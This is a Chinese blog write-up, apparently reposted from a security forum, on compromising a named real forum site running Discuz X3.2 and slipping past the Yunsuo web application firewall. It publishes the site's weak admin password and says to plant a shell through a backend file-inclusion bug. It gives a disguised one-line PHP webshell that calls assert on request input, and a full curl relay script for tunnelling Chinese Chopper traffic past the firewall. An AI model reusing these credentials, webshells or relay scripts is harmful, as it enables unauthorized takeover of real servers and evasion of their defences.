过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)

直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer

f92bc6b2301150a6d4a65f3e60d07b9a.png

进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可怜的用户数量来看,未打补丁的可能性比较大,那就尝试getshell吧,参考WooYun: Discuz3.2后台文件包含漏洞可后台拿shell具体操作过程就不啰嗦了,这里面有个小细节,一定要把服务器具体IP添加到本地host里面去,否则云锁waf会拦截的(至于怎么获得具体IP,最简单的是发送邮件测试)通过后台“文件检验”功能,我们能清楚的看到一句话文件成功生成了

f5c5643bffd1737dad33692bf1775f84.png

我们浏览器访问看看

ab532133a19f60e9e5a4accac691f848.png

被云锁waf拦截了,估计菜刀肯定也连不了

e4b597cc89ac535b5400bc92bb3ba119.png

果不其然,也被拦了,乌云zone翻了下前辈们的经验之谈,终于突破了,重点请往下看1、变形一句话

$_REQUEST['a']($_REQUEST['b']);

?>

1

2

3

$_REQUEST['a']($_REQUEST['b']);

?>

按上面getshell的方法重新将一句话写入根目录,得访问地址http://bbs.sudu.cn/help.php测试一下http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();

3e4d4fee0954e753a78358a08504cb6d.png

2、新建shell.php,填入菜刀中转脚本

$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址

$poststr='';

$i=0;

foreach($_POST as $k=>$v)

{

if(strstr($v, "base64_decode"))

{

$v=str_replace("base64_decode(","",$v);

$v=str_replace("))",")",$v);

}

else

{

if($k==="z0")

$v=base64_decode($v);

}

$pp=$k."=".urlencode($v);

//echo($pp);

if($i!=0)

{

$poststr=$poststr."&".$pp;

}

else

{

$poststr=$pp;

}

$i=$i+1;

}

$ch = curl_init();

$curl_url = $target."?".$_SERVER['QUERY_STRING'];

curl_setopt($ch, CURLOPT_URL, $curl_url);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($ch);

curl_close($ch);

echo $result;

?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址

$poststr='';

$i=0;

foreach($_POSTas$k=>$v)

{

if(strstr($v,"base64_decode"))

{

$v=str_replace("base64_decode(","",$v);

$v=str_replace("))",")",$v);

}

else

{

if($k==="z0")

$v=base64_decode($v);

}

$pp=$k."=".urlencode($v);

//echo($pp);

if($i!=0)

{

$poststr=$poststr."&".$pp;

}

else

{

$poststr=$pp;

}

$i=$i+1;

}

$ch=curl_init();

$curl_url=$target."?".$_SERVER['QUERY_STRING'];

curl_setopt($ch,CURLOPT_URL,$curl_url);

curl_setopt($ch,CURLOPT_POST,1);

curl_setopt($ch,CURLOPT_POSTFIELDS,$poststr);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$result=curl_exec($ch);

curl_close($ch);

echo$result;

?>

3、本地搭建php环境,将中转脚本置于中,菜刀中连接,地址处填http://127.0.0.1:8004/shell.php?a=assert 密码处填b

d5cfcef27c6281683acb0b49508eedde.png

成功突破,如图

768cc85d7a6fad61eb983ffae3f676d3.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值